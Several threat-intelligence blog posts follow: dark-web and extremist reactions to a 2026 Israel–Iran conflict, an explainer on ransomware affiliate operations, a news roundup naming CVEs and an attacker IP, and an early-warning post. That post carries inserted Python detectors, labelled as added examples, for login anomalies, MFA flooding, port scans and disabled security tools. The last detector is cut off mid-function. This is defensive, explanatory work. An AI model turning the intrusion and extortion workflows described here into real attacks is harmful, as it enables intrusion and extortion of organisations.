Dark Web Reactions to the Israel–Iran Conflict

March 09, 2026

On 28 February 2026, the United States and Israel launched airstrikes against Iran targeting key military commanders, nuclear facilities, and government infrastructure. The attacks reportedly resulted in the death of Supreme Leader Ali Khamenei, along with several senior officials. Iran immediately retaliated using drones and missiles against U.S. bases in the region as well as targets in Israel. Missile strikes were also reported in Saudi Arabia, the UAE, and Qatar. The conflict continues to escalate, with the U.S. government reportedly pursuing regime change while Iran seeks to demonstrate regional military capability.

As these real-world events unfold, communities on the dark web and adjacent platforms have also reacted to the conflict. Some groups have participated in cyberattacks, others have provided commentary, and many have used messaging platforms such as Telegram to share real-time updates. This blog explores reactions observed across these ecosystems.

Hacktivist groups are online collectives or loosely organized networks that use hacking or disruptive digital tactics to promote a political, social, or ideological cause. These groups have become increasingly visible on platforms such as X (Twitter) and Telegram, where they seek notoriety for their activities, particularly during major geopolitical events such as the conflict in Ukraine and the October 7 attacks in Israel. The strikes against Iran have similarly prompted increased hacktivist activity.

Common attack types associated with hacktivist groups include:

  • Distributed Denial of Service (DDoS) attacks: overwhelming a website or online service with large volumes of traffic, rendering it slow or unavailable to legitimate users.
  • Website defacement: compromising a website and replacing its content with propaganda, slogans, threats, or political messaging.
  • Data leaks: hackers steal and publish emails, documents, or internal files to embarrass or expose targeted organizations.

Although other types of cyber activity may occur, these represent the primary tactics observed among the hacktivist groups tracked by DarkOwl.

There has been a noticeable increase in hacktivist activity following the airstrikes on Iran, with many groups taking sides and targeting organizations or countries they perceive to be involved in the conflict. Several groups that previously supported pro-Palestinian causes have also opposed the strikes on Iran due to their broader opposition to Israel.

According to a recent report from Radware, 110 organizations were targeted across 149 hacktivist-driven DDoS attacks in the immediate aftermath of the U.S.-Israel campaign against Iran. Of these incidents, 107 targeted entities in the Middle East, primarily public infrastructure and government institutions.

The Tunisian hacktivist group Hider Nex posted on 28 February, after a 10-day hiatus, claiming to have launched an attack against an Israeli telecommunications company in response to the strikes on Iran. The activity appeared to involve a DDoS attack. In their messaging, the group stated they “support Iran in the war against the enemies of Islam.”

The group has continued to target organizations in Israel. However, while conducting these attacks, they have also attempted to sell DDoS services and alleged Israeli data leaks, suggesting their motivations may be partly financial rather than purely ideological.

Another hacktivist group, Nation of Saviors, changed its Telegram profile image to depict the deceased Iranian Supreme Leader.

A Russian-affiliated hacktivist group known as Babayo Eror System began posting on 1 March, claiming attacks against U.S. and Israeli websites.

The group has also reposted content from Keymous+, a pro-Russian collective that has issued threats against Gulf states, arguing that these countries stand to benefit from U.S. and Israeli strikes on Iran. The group has framed these activities under the hashtag #Op_Epstein_Gulf, an apparent reference to disgraced financier Jeffrey Epstein.

While most hacktivist groups observed have focused primarily on DDoS attacks and website defacement, some are expanding their messaging to include references to potential targets and reported casualties. Additional information related to this activity is discussed later in this blog.

Many of these groups are also sharing videos and images related to the conflict, as well as commentary from politicians and public figures. While some of this content appears to be AI-generated, other material appears legitimate; however, the authenticity of these images and videos has not been independently verified. Some media also appears to be forwarded directly from news sources.

The mixture of authentic media, reposted news footage, and AI-generated imagery reflects a broader pattern of information amplification and narrative shaping commonly observed in hacktivist online ecosystems.

The group Z-BL4CX-H4T shared a video appearing to show a hangar filled with drones and followed this with posts listing countries they claimed Iran had successfully attacked.

The group also claimed that North Korea was supporting Iran in attacks against U.S.- and Israel-affiliated sites.

As with previous conflicts, Telegram has become a major source of real-time information sharing. Numerous posts on the platform have circulated footage of missile strikes, images of military equipment, and updates from official organizations.

The Telegram channel ايران بالعربي (Iran in Arabic), which supports the Iranian government, shared images and video footage of protests allegedly criticizing U.S. imperialism. The post claimed the protest took place in Stockholm, although DarkOwl has not verified the authenticity of these images.

The channel also shared images that appear to show people celebrating in the streets of Tehran.

As during the October 7 attacks, the IDF Telegram channel has been used to share official updates and warnings with Israeli citizens, including guidance on whether residents should take shelter.

News agencies have also circulated urgent warnings, identifying areas being targeted.

Additional videos circulating on Telegram appear to show damage from airstrikes in civilian areas. These images have not been independently verified by DarkOwl.

Other imagery shared on Telegram attempts to link the conflict in Iran with the ongoing war in Gaza.

Several groups associated with white supremacist ideology have also commented on the conflict.

One group stated that while they oppose Israel due to antisemitic beliefs, they also do not support Iran due to its Muslim identity, reflecting their ideological vision of a white, Christian ethno-state.

However, another Telegram channel shared an AI-generated image supporting Iran, which included both the Iranian flag and the Sonnenrad symbol, commonly associated with neo-Nazi and Atomwaffen-affiliated extremist groups.

This example highlights a broader trend in which ideological boundaries are increasingly blurred, particularly among groups linked to Nihilistic Violent Extremism (NVE).

DarkOwl monitors a range of Telegram and Rocket.Chat channels used by jihadist groups and their supporters, including communities linked to ISIS and al-Qaeda. Early reactions to the Israel–Iran conflict have emerged across these platforms.

A statement attributed to a group calling itself the Cyber Jihad Movement was identified on March 4, 2026, by counterterrorism researchers. The English-language document presents the group as an “IT organization linked to al-Qaeda” and calls on supporters to participate in what it describes as a “global cyber jihad.”

The statement encourages technically skilled supporters to conduct cyber operations targeting the governments and institutions of the United States, Israel, Pakistan, India, and several Arab countries, including cyberattacks designed to disrupt financial systems and government infrastructure.

The document also announces the group’s “entry” into the Iran–United States conflict and the Afghanistan–Pakistan conflict, expressing support for the Pakistani Taliban (TTP) and the Islamic Emirate of Afghanistan (Taliban).

While there is currently no public evidence of operational capability associated with the Cyber Jihad Movement, the messaging reflects ongoing attempts by jihadist-aligned actors to frame cyber activity as a legitimate extension of militant struggle.

Supporters of the Islamic State also discussed the conflict on an unofficial Rocket.Chat server historically used by IS sympathizers.

Users shared reactions to early reports of the conflict, often expressing hostility toward Iran and Shia Muslims.

Some users suggested that prolonged military pressure on Iran could create opportunities for expansion by Islamic State Khorasan Province (ISKP).

Some participants framed the conflict as validation of Islamic State narratives about its ability to challenge global powers.

Discussion on the server also revealed growing paranoia about infiltration by researchers and law enforcement, particularly following arrests linked to previous administrators of the community.

These conversations illustrate how jihadist communities interpret geopolitical events through ideological narratives while simultaneously dealing with internal distrust and operational pressure.

Iranian-aligned militia groups across Iraq and the broader “Axis of Resistance” ecosystem have also used Telegram channels to shape narratives surrounding the conflict, combining operational claims, ideological messaging, and propaganda directed at regional and Western audiences.

The group وحدة الصفوة (Safwa Unit), which claims affiliation with Kata’ib Hezbollah, has circulated graphics identifying alleged Israeli targets, including Israeli officials and public figures.

The channel has also shared imagery commemorating individuals it describes as Hezbollah “martyrs.”

Such messaging blends propaganda and intimidation and reflects a broader pattern of militant-aligned channels using visual propaganda to signal potential targets while reinforcing narratives of resistance.

Another Telegram channel monitored by DarkOwl is أصحاب الكهف (Ashab al-Kahf), affiliated with Iraqi Popular Mobilization Forces (PMF) factions including Kata’ib Sarkhat al-Quds (كتائب صرخة القدس).

Recent posts on the channel have focused on the conflict and tensions involving U.S. forces.

One statement claimed responsibility for targeting a U.S. military base in Kuwait using drones, warning that operations would escalate.

Other posts emphasized ideological alignment with Iranian Supreme Leader Ali Khamenei, framing the conflict as part of a broader struggle against Western influence.

The channel also shared stylized propaganda imagery depicting Khamenei in a militant setting.

Taken together, this content illustrates how Iranian-aligned militia channels blend operational claims, ideological messaging, and propaganda to frame regional conflict narratives.

Communities across the dark web and adjacent platforms are actively reacting to the escalating conflict between Iran, Israel, and the United States. These reactions vary widely depending on the ideological orientation of each community.

Hacktivist groups have attempted cyberattacks against perceived adversaries; news channels have used Telegram to disseminate real-time updates; and extremist communities have leveraged the conflict to amplify propaganda narratives.

As the conflict continues to evolve, online discourse within these ecosystems will shift alongside real-world developments. DarkOwl will continue monitoring these platforms for emerging threats, cyber activity, and extremist messaging related to the conflict.


Ransomware Affiliate Programs: Anatomy of a Criminal SaaS

March 5, 2026

Ransomware isn’t just malware; it is an operating model. Increasingly, ransomware groups, in addition to extorting victims themselves, operate “affiliate programs,” often called Ransomware-as-a-Service (RaaS). In this arrangement, a core team provides the tooling and brand, while affiliates conduct intrusions and share the proceeds with the owners of the malware.

This blog breaks down how the affiliate model works, why it persists, and which ransomware “brands” researchers most often associate with affiliate-driven operations in 2025.

A ransomware affiliate program is a partnership structure between a core operator group – usually developers and infrastructure maintainers – and affiliates, usually intrusion teams who deploy the ransomware and run extortion negotiations with the victim, with revenue typically split between them. Think of it as a criminal version of a platform business: the “platform” team builds and maintains the product (ransomware plus infrastructure), while “partners” scale distribution (intrusions) in exchange for a share of profits.

The core group is usually responsible for maintaining the ransomware codebase and continually updating it to evade defenses; it also hosts the negotiation portals, victim dashboards, and leak sites where victim data is published on the dark web.

The core group also provides “support” to affiliates: troubleshooting, process guidance, and whatever else is needed to keep affiliates successful.

Affiliate programs usually have a strict set of rules on how the ransomware can be used. The core group sets and enforces these rules, which typically cover who may target what, which tactics are allowed, and how disputes are handled.

Affiliate groups are usually responsible for choosing targets and executing intrusions using the malware supplied by the core group. They also perform data theft and the later-stage deployment steps, run negotiations (sometimes under operator oversight or using supplied templates), and coordinate payment verification and the handoff of decryption. Practices and revenue shares vary from program to program.

Although the core group and the affiliates are the main practitioners, other threat actors can also be involved in this ecosystem such as Initial Access Brokers (IABs) who sell access to compromised environments which the ransomware group or affiliates will then use to target victims. There can also be specialist roles for credential theft, phishing, negotiation, laundering, etc.

This separation makes attribution harder for researchers and explains why the same intrusion patterns can “carry over” even when a ransomware “brand” changes.

Most established RaaS operations provide a bundle that looks like a grim SaaS product. This can include affiliate panels or dashboards to manage victims, builds, and negotiations; a standardized extortion workflow with victim instructions and negotiation playbooks; and product support. Affiliates are also given access to leak-site infrastructure, hosted on the dark web, to publish victim data and increase pressure. Beyond the tooling, being an affiliate is attractive because it confers brand credibility: a known “name” can increase perceived threat and victim payment rates. Not all ransomware groups are equal, and some have a reputation for success or for hitting high-profile victims.

While the entry method differs by actor, many affiliate-run incidents follow a familiar lifecycle:

  1. Initial Access: The threat actor obtains access to the victim’s infrastructure, commonly via stolen credentials, exposed services, or access purchased from an initial access broker. Increasingly, data leaked after a ransomware attack is used to target the victim’s supply chain.
  2. Data Theft: Traditionally ransomware encrypted data so the victim could not access it, but that is no longer usually the case; most actors now simply exfiltrate as much data as they can from the victim. This data is then used to extort the victim in the hope that the “ransom” will be paid to avoid the financial and reputational damage of having data shared on the dark web.
  3. Encryption & Ransom: Some actors do still use encryption as part of their tactics, and in all cases they issue a ransom note detailing their demands – usually payment in cryptocurrency. Many groups position themselves in these notes as researchers who are helping the victim avoid damage. Whether encryption occurs is sometimes secondary; the “business” is often extortion, not encryption.
  4. Negotiation: The ransom note usually gives the victim a deadline to pay before their data is released; this can also appear as a countdown on the dark web leak site. The actors often provide a portal, typically on the dark web, through which the victim can contact them and negotiate. As most victims do not disclose whether they paid, we do not have a clear picture of how these negotiations play out.
  5. Payment or Leak: If the victim chooses to pay, they are given a cryptocurrency address to send the payment to. They receive a decryptor, if the data was actually encrypted, and the victim’s name is removed from the leak site. However, the fact that the victim appeared on the site and was then removed can itself suggest that a payment was made and can still cause reputational damage.

Many 2025 “top group” lists rely on data-leak site postings as a proxy for activity, but this undercounts failed extortions, private settlements, and unposted victims. Furthermore, because the data has already been exfiltrated, there is no guarantee that making the payment means the data will never be released. If the payment is not made, the data is made available for download on the leak site.

Affiliate programs need incentives and mechanisms to manage distrust and to attract “good” actors to run operations. Programs usually work on the basis of revenue splits, where the affiliate keeps the larger portion and operators take a platform fee.

Affiliates often choose a ransomware brand that has not only had public success but is also perceived as a reliable payer. They may work with multiple groups. RaaS operators compete for affiliates with better splits, better support, more stable infrastructure, and broader “brand” recognition.

However, the core group can also be picky about who it works with; some groups are reported to work only with affiliates from certain countries, and they set up their systems to guard against exit scams, in which one party keeps all of the proceeds and the other never receives its share.

Takedowns, leaks, and internal conflicts can lead to splits, rebrands, and “new” groups that may be continuity operations rather than truly new actors. When a brand is disrupted, affiliates don’t disappear; they migrate, bringing tradecraft and victim targeting patterns with them.

Below are ransomware “brands” reported to be operating in an affiliate-friendly or RaaS-like manner. This is not exhaustive, and “brand” ≠ a single consistent team.

All of these groups are tracked by DarkOwl, with their leak sites being closely monitored for new victims.

Ransomware affiliate programs persist because they’re efficient; they turn a complex criminal operation into a repeatable platform. In 2025, the most important researcher takeaway isn’t just which brand is “on top,” but how affiliates move, how brands compete for them, and how extortion infrastructure evolves across disruptions.


Learn how DarkOwl tracks these groups and more. Contact us.

Threat Intelligence RoundUp: February

March 02, 2026

Our analyst team shares a few articles each week in our email newsletter, which goes out every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. Mandiant Finds ShinyHunters-Style Vishing Attacks Stealing MFA to Breach SaaS Platforms – The Hacker News

On January 31, Mandiant reported a newly identified expansion in threat activity involving tactics similar to those used by ShinyHunters. These attacks employ voice phishing (vishing) and credential-harvesting websites that impersonate targeted organizations, enabling attackers to obtain single sign-on (SSO) credentials and multi-factor authentication (MFA) codes to gain unauthorized access to victim environments. Mandiant’s threat intelligence team said it is monitoring the activity across several clusters, UNC6661, UNC6671, and UNC6240 (ShinyHunters), to account for the possibility that these groups are evolving their tactics or imitating previously observed methods. Read full article.

2. Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks – BleepingComputer

CISA flagged a critical SolarWinds Web Help Desk (WHD) vulnerability, CVE-2025-40551, that is now being exploited by unknown hackers. Using legitimate tools, such as Zoho ManageEngine, threat actors were able to target organizations and maintain persistent, hands-on access to compromised environments. Following initial access, attackers installed the Zoho ManageEngine Assist agent from an MSI hosted on the Catbox file-sharing platform, configured it for unattended access, and registered the affected host with a Zoho Assist account created using an anonymous Proton Mail address. Article here.

On January 28, it was discovered the FBI had seized RAMP, a Russian cybercrime forum, that advertised malware and hacking services. Both the forum’s Tor site and its Clearnet domain, ramp4u[.]io, have been taken offline and now show a seizure banner declaring, “The Federal Bureau of Investigation has seized RAMP.” According to the notice, “This action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice,” indicating a multi-agency effort behind the takedown. RAMP administrator “Stallman” acknowledged the takedown in a message on XSS, adding that he has no plans to create a successor platform. Read more here.

The Chinese state hacking group UNC6201 is believed to be behind the zero-day exploitation of a vulnerability in Dell RecoverPoint for Virtual Machines, tracked as CVE-2026-22769. The high-risk vulnerability has been exploited since May 2024, with persistent access maintained through the SLAYSTYLE and BRICKSTORM malware. Additionally, UNC6201 deploys a newly identified malware called Grimbolt, which leverages a technique that is faster and more difficult to analyze than BRICKSTORM. Google Threat Intelligence Group (GTIG) has not confirmed an initial access vector, but previous attacks connected to UNC6201 suggest that edge appliances are a likely initial access target. Read here.

5. Reynolds Ransomware Embeds BYOVD Driver to Disable EDR Security Tools – The Hacker News

Researchers have identified a new ransomware family, Reynolds, which embeds a built-in Bring Your Own Vulnerable Driver (BYOVD) component within its payload to evade security defenses. BYOVD abuses vulnerabilities in legitimate driver software to disable Endpoint Detection and Response (EDR), making it possible for malicious activity to go undetected. While similar techniques have been observed in prior attacks, the Reynolds campaign specifically drops a vulnerable NsecSoft NSecKrnl driver and terminates processes associated with multiple security programs. Learn more.

6. One threat actor responsible for 83% of recent Ivanti RCE attacks – BleepingComputer

Recent threat intelligence observations link one threat actor to two critical vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM). According to the GreyNoise Threat Research team, 417 exploitation sessions against EPMM were observed between February 1 and 9. Of those 417, 83% can be tracked to a single IP address (193.24.123.42) on bulletproof infrastructure. The activity is designed to trigger a DNS callback to a unique subdomain controlled by the tester. This approach allows threat actors to confirm that their command was successfully executed without needing a direct response from the target system. Read full article.

7. Sandworm hackers linked to failed wiper attack on Poland’s energy systems – BleepingComputer

In late December 2025, the Russian state-sponsored hacking group Sandworm attempted to deploy a destructive “data-wiping malware” called DynoWiper against Poland’s power grid. Polish officials have claimed the attack “targeted two combined heat and power plants as well as a management system used to control electricity generated from renewable sources such as wind turbines and photovoltaic farms.” Officials also stated that their current “systems in place” were able to prevent the attack but gave minimal additional information. Read full article.

8. China-Linked Amaranth-Dragon Exploits WinRAR Flaw in Espionage Campaigns – The Hacker News

Throughout 2025, Amaranth-Dragon, a China-linked threat actor, has been connected with new cyber espionage campaigns targeting government and law enforcement in Southeast Asia. The threat actor abused a now-patched security vulnerability (CVE-2025-8088) in RARLAB WinRAR, which permits arbitrary code execution upon opening a specially crafted archive. Although the exact method of initial access is still unclear, the highly targeted nature of the campaigns and the use of customized lures tied to regional political, economic, or military events strongly suggest spear-phishing. In these attacks, emails likely delivered archive files hosted on trusted cloud services such as Dropbox, helping attackers appear legitimate and evade traditional perimeter defenses. Learn more.


Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

7 Early Warning Signals before a Cyberattack: Know what to look for and how to counter them

February 26, 2026

Cyberattacks rarely begin at the moment of impact. There are usually early warning signals.

Long before ransomware detonates, credentials are stolen and sold, and data is quietly exfiltrated from the system. That means there are indicators: slight behavior shifts, fragments of telemetry that, viewed individually, look harmless but, viewed together, tell a story.

Most organizations do not fall victim because they lack tools. They become victims because they miss or dismiss early warning signals as noise.

If you want to interrupt an attack before it becomes an incident, you have to know what to look for, and you have to treat weak signals seriously.

Identity is the primary control plane in modern environments. According to the 2024 Verizon Data Breach Investigations Report, the majority of breaches continue to involve the human element, including stolen credentials and social engineering.

Early warning signs often appear in authentication telemetry before anything else.

Look for:

  • Repeated failed logins followed by a successful login from the same account
  • Logins from atypical geographies or impossible travel scenarios
  • Dormant accounts suddenly becoming active
  • Privilege escalation requests that do not align with job functions

These are not necessarily breaches. But they are often precursors.

Adversaries frequently test credentials quietly before operationalizing access. The MITRE ATT&CK framework documents techniques such as credential stuffing, password spraying, and valid account abuse under Initial Access and Persistence tactics.

If identity behavior shifts, assume it is meaningful until proven otherwise.

Multifactor authentication is not invincible. Attackers increasingly exploit user behavior instead of cryptographic weaknesses.

Push bombing, also known as MFA (multifactor authentication) fatigue, floods a user with repeated authentication prompts until they approve one out of frustration or confusion. The Cybersecurity and Infrastructure Security Agency has published guidance highlighting this growing tactic.

Early warning indicators include:

  • Multiple MFA prompts within short time periods
  • Authentication approvals outside normal working hours
  • Users reporting repeated push requests they did not initiate

When a user comments, “I keep getting login prompts even though I’m not trying to sign in,” that’s not a help desk or internal IT nuisance. It’s an intrusion attempt in progress.

Privilege creep happens naturally over time. Attack-driven privilege escalation looks different.
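The identity signals in the two lists above (a burst of failed logins followed by a success, dormant accounts waking up, impossible travel, and MFA push floods) can be checked mechanically over sign-in telemetry. The block below is an added example, not code from the original post or from DarkOwl: the event schema, the thresholds, the assumed 08:00–18:00 working-hours window, and the sample users and times are all constructed. A real deployment would read the same fields from an identity provider's sign-in and MFA logs.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def ev(ts, user, kind, result, country="US"):
    """Build one normalized auth event (constructed schema, not a vendor format)."""
    return {"ts": ts, "user": user, "type": kind, "result": result, "country": country}


# Constructed sample telemetry; none of these users, times or countries are real.
SAMPLE_EVENTS = [
    # alice: five failed logins, then a success nine minutes after the first
    *[ev(f"2026-02-20T09:0{i}:00", "alice", "login", "fail") for i in range(5)],
    ev("2026-02-20T09:09:00", "alice", "login", "success"),
    # bob: one mistyped password, then success (benign noise)
    ev("2026-02-20T09:10:00", "bob", "login", "fail"),
    ev("2026-02-20T09:10:30", "bob", "login", "success"),
    # carol: silent since November, then a 03:15 login from a new country
    ev("2025-11-01T08:00:00", "carol", "login", "success"),
    ev("2026-02-20T03:15:00", "carol", "login", "success", "RO"),
    # dave: successful logins from two countries 45 minutes apart
    ev("2026-02-20T10:00:00", "dave", "login", "success"),
    ev("2026-02-20T10:45:00", "dave", "login", "success", "SG"),
    # erin: five denied push prompts in eight minutes, then an approval at 02:30
    *[ev(f"2026-02-20T02:{20 + 2 * i}:00", "erin", "mfa_push", "denied") for i in range(5)],
    ev("2026-02-20T02:30:00", "erin", "mfa_push", "approved"),
]


def _by_user(events, kind):
    """Group events of one type per user, time-sorted, with a parsed datetime."""
    grouped = defaultdict(list)
    for e in events:
        if e["type"] == kind:
            grouped[e["user"]].append({**e, "t": datetime.fromisoformat(e["ts"])})
    for evs in grouped.values():
        evs.sort(key=lambda e: e["t"])
    return grouped


def failed_then_success(events, min_failures=5, window=timedelta(minutes=10)):
    """Signal: a success preceded by >= min_failures failures inside the window."""
    hits = []
    for user, evs in _by_user(events, "login").items():
        for i, e in enumerate(evs):
            if e["result"] != "success":
                continue
            fails = [f for f in evs[:i] if f["result"] == "fail" and e["t"] - f["t"] <= window]
            if len(fails) >= min_failures:
                hits.append((user, e["ts"]))
    return hits


def dormant_reactivation(events, dormant_days=90):
    """Signal: an account with no successful login for dormant_days logs in again."""
    hits = []
    for user, evs in _by_user(events, "login").items():
        ok = [e for e in evs if e["result"] == "success"]
        for prev, cur in zip(ok, ok[1:]):
            if cur["t"] - prev["t"] >= timedelta(days=dormant_days):
                hits.append((user, cur["ts"]))
    return hits


def impossible_travel(events, min_hours=2):
    """Signal: consecutive successes from different countries closer than min_hours."""
    hits = []
    for user, evs in _by_user(events, "login").items():
        ok = [e for e in evs if e["result"] == "success"]
        for prev, cur in zip(ok, ok[1:]):
            if cur["country"] != prev["country"] and cur["t"] - prev["t"] < timedelta(hours=min_hours):
                hits.append((user, prev["country"], cur["country"], cur["ts"]))
    return hits


def mfa_push_flood(events, threshold=5, window=timedelta(minutes=15)):
    """MFA fatigue: >= threshold push prompts inside one window. Reports whether the
    burst ended in an approval and whether that approval fell outside the assumed
    08:00-18:00 working hours."""
    hits = []
    for user, evs in _by_user(events, "mfa_push").items():
        for start in range(len(evs)):
            burst = [p for p in evs[start:] if p["t"] - evs[start]["t"] <= window]
            if len(burst) >= threshold:
                approval = next((p for p in burst if p["result"] == "approved"), None)
                off_hours = approval is not None and not 8 <= approval["t"].hour < 18
                hits.append((user, evs[start]["ts"], approval is not None, off_hours))
                break  # one finding per user is enough to open a ticket
    return hits


def triage(events):
    """Run every check and return the findings keyed by signal name."""
    return {
        "failed_then_success": failed_then_success(events),
        "dormant_reactivation": dormant_reactivation(events),
        "impossible_travel": impossible_travel(events),
        "mfa_push_flood": mfa_push_flood(events),
    }


if __name__ == "__main__":
    for signal, findings in triage(SAMPLE_EVENTS).items():
        print(f"{signal}: {findings}")
```

On the constructed data, alice, carol, dave and erin each trip exactly one check while bob's single typo stays quiet; the thresholds are starting points to tune against your own baseline, and the `mfa_push_flood` result is the one to escalate first, because an approval at the end of a denial burst is the user giving in, not the user signing in.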

Take notice when you see:

  • Service accounts added to privileged groups without change control documentation
  • Administrative roles assigned temporarily and never revoked
  • API keys created outside normal deployment pipelines

The 2023 IBM Cost of a Data Breach Report noted that organizations with mature identity and access management practices experienced significantly lower breach costs compared to those without.

Access expansion without operational justification is rarely accidental. It is often reconnaissance or staging.

Before large-scale data exfiltration occurs, the threat actors have already mapped out the environment. They enumerate systems, probe for open ports, and test lateral movement before escalating.

Signals to look for:

  • Internal port scanning from a user workstation
  • Lateral traffic patterns that do not match baseline behaviors
  • DNS queries to newly registered or suspicious domains

According to the 2024 CrowdStrike Global Threat Report, adversaries continue to reduce breakout times, meaning the time between initial access and lateral movement can be quite short.

If your only alerts fire on large data transfers, you are reacting at the end of the story. Early detection means paying attention to reconnaissance.
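The three reconnaissance signals listed above (internal port scanning from a workstation, lateral traffic outside a host's baseline, and DNS lookups for newly registered or unknown domains) are shown as batch checks over flow and DNS records below. This is an added example, not code from the original post or from DarkOwl. The flow tuples, the RFC 1918 addresses, the baseline peer table, the registration-date table that stands in for a domain-age feed, and the `.example` / `.invalid` domains are all constructed; a real pipeline would feed the same shapes from NetFlow or firewall logs, a DNS resolver log, and an RDAP/WHOIS or domain-age enrichment.

```python
from collections import defaultdict
from datetime import date, datetime, timedelta

# Constructed flow records (ts, src, dst, dst_port). Addresses are RFC 1918
# placeholders, not real hosts.
SCAN_PORTS = [21, 22, 23, 25, 53, 80, 88, 110, 135, 139, 143, 389, 443, 445,
              993, 995, 1433, 3306, 3389, 5985, 5986, 8080, 8443, 9200, 27017]
FLOWS = [
    # 10.0.5.23 touches 25 ports on one server inside 25 seconds (vertical scan)
    *[(f"2026-02-20T11:00:{i:02d}", "10.0.5.23", "10.0.5.40", p) for i, p in enumerate(SCAN_PORTS)],
    # 10.0.5.24: routine SMB to its file server, then RDP to a host it never talks to
    ("2026-02-20T11:05:00", "10.0.5.24", "10.0.1.10", 445),
    ("2026-02-20T11:20:00", "10.0.5.24", "10.0.1.10", 445),
    ("2026-02-20T11:31:00", "10.0.5.24", "10.0.1.20", 3389),
]
# Constructed baseline of the internal peers each workstation normally reaches.
BASELINE_PEERS = {"10.0.5.23": {"10.0.1.10"}, "10.0.5.24": {"10.0.1.10"}}
ADMIN_PORTS = {22, 445, 3389, 5985, 5986}  # SSH, SMB, RDP, WinRM

# Constructed DNS query log (ts, host, domain) and a constructed registration-date
# table standing in for an RDAP/WHOIS or domain-age feed. .example and .invalid
# are reserved TLDs, so these names cannot resolve to anything real.
DNS_QUERIES = [
    ("2026-02-20T11:30:00", "10.0.5.24", "fileshare.corp.example"),
    ("2026-02-20T11:30:05", "10.0.5.24", "upd-cdn-7731.example"),
    ("2026-02-20T11:30:09", "10.0.5.23", "beacon.invalid"),
]
REGISTRATION_DATES = {
    "fileshare.corp.example": date(2014, 5, 1),
    "upd-cdn-7731.example": date(2026, 2, 8),
}
AS_OF = date(2026, 2, 20)  # evaluation date for domain age


def port_scan_sources(flows, min_targets=20, window=timedelta(minutes=5)):
    """Sources that reached >= min_targets distinct (host, port) pairs within one
    sliding window. Returns {src: largest distinct-target count seen}."""
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        by_src[src].append((datetime.fromisoformat(ts), dst, port))
    findings = {}
    for src, recs in by_src.items():
        recs.sort()
        for i, (t0, _, _) in enumerate(recs):
            targets = {(d, p) for t, d, p in recs[i:] if t - t0 <= window}
            if len(targets) >= min_targets:
                findings[src] = max(findings.get(src, 0), len(targets))
    return findings


def lateral_movement_outliers(flows, baseline, admin_ports=ADMIN_PORTS):
    """Admin-protocol connections to peers outside the source's baseline set."""
    outliers = set()
    for _, src, dst, port in flows:
        if port in admin_ports and dst not in baseline.get(src, set()):
            outliers.add((src, dst))
    return outliers


def suspicious_dns(queries, registration_dates, as_of=AS_OF, max_age_days=30):
    """Queries for domains registered within max_age_days, or with no registration
    record at all (age None), which deserves a look just as much."""
    hits = []
    for _, host, domain in queries:
        registered = registration_dates.get(domain)
        age = (as_of - registered).days if registered else None
        if age is None or age <= max_age_days:
            hits.append((host, domain, age))
    return hits


if __name__ == "__main__":
    print("port scans:", port_scan_sources(FLOWS))
    print("lateral outliers:", lateral_movement_outliers(FLOWS, BASELINE_PEERS))
    print("young/unknown domains:", suspicious_dns(DNS_QUERIES, REGISTRATION_DATES))
```

Each check alone is noisy (a vulnerability scanner also touches many ports; a new file server is also outside the baseline), so the value comes from correlating them on the same source within a short window, which is exactly the "weak signals across layers" posture the post argues for.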

Attackers frequently attempt to disable security tooling before executing payloads.

Warning signals include:

  • Endpoint detection agents being stopped or uninstalled
  • Logging services disabled or modified
  • Registry or system configuration changes affecting security posture

Again, the MITRE ATT&CK technique Impair Defenses specifically outlines how adversaries disable or modify security tools to evade detection.

If telemetry goes dark unexpectedly, treat that as an alert, not as an inconvenience.
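Two of the signals just described are easy to miss in a SIEM built around "something happened" rules: a security service being stopped or disabled among hundreds of routine service events, and a sensor that simply stops reporting. The block below is an added example, not code from the original post or from DarkOwl. It matches Windows-style service, log-clear and audit-policy events against a watch list and flags hosts where several such events cluster, and it separates a sensor that went quiet from a host that went offline by comparing the last agent heartbeat with the last time the host was seen on the network. The events, hostnames and timestamps are constructed; `WinDefend` and `Sysmon64` are real Windows service names, while `EDRAgent` is a placeholder for whatever your EDR vendor's service is called.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Services whose stopping or disabling should page someone. WinDefend and Sysmon64
# are real Windows service names; "EDRAgent" is a placeholder for your EDR service.
WATCHED_SERVICES = {"WinDefend", "Sysmon64", "EDRAgent"}

# Constructed events (not real logs). event_id follows Windows conventions:
# 7036 service state change and 7040 start-type change (System log);
# 1102 Security log cleared and 4719 audit policy changed (Security log).
EVENTS = [
    {"ts": "2026-02-20T12:00:00", "host": "WS-0142", "event_id": 7036, "service": "Spooler", "state": "stopped"},
    {"ts": "2026-02-20T12:01:10", "host": "WS-0142", "event_id": 7036, "service": "Sysmon64", "state": "stopped"},
    {"ts": "2026-02-20T12:01:12", "host": "WS-0142", "event_id": 7040, "service": "EDRAgent", "start_type": "disabled"},
    {"ts": "2026-02-20T12:02:00", "host": "WS-0142", "event_id": 1102},
    {"ts": "2026-02-20T12:03:00", "host": "SRV-DB01", "event_id": 4719},
    {"ts": "2026-02-20T12:04:00", "host": "WS-0200", "event_id": 7036, "service": "Sysmon64", "state": "running"},
]

# Constructed sensor heartbeats and last network activity per host (e.g. from DHCP
# or flow records), used to tell "sensor went quiet" from "host went offline".
HEARTBEATS = {"WS-0142": "2026-02-20T12:01:00", "WS-0200": "2026-02-20T12:55:00", "WS-0300": "2026-02-20T09:00:00"}
LAST_SEEN_ON_NETWORK = {"WS-0142": "2026-02-20T12:58:00", "WS-0200": "2026-02-20T12:58:00", "WS-0300": "2026-02-20T09:05:00"}
NOW = datetime(2026, 2, 20, 13, 0, 0)  # constructed evaluation time


def defense_impairment_findings(events, watched=WATCHED_SERVICES):
    """Return (host, ts, description) for events that weaken security tooling or visibility."""
    findings = []
    for e in events:
        eid = e["event_id"]
        if eid == 7036 and e.get("service") in watched and e.get("state") == "stopped":
            findings.append((e["host"], e["ts"], f"security service stopped: {e['service']}"))
        elif eid == 7040 and e.get("service") in watched and e.get("start_type") == "disabled":
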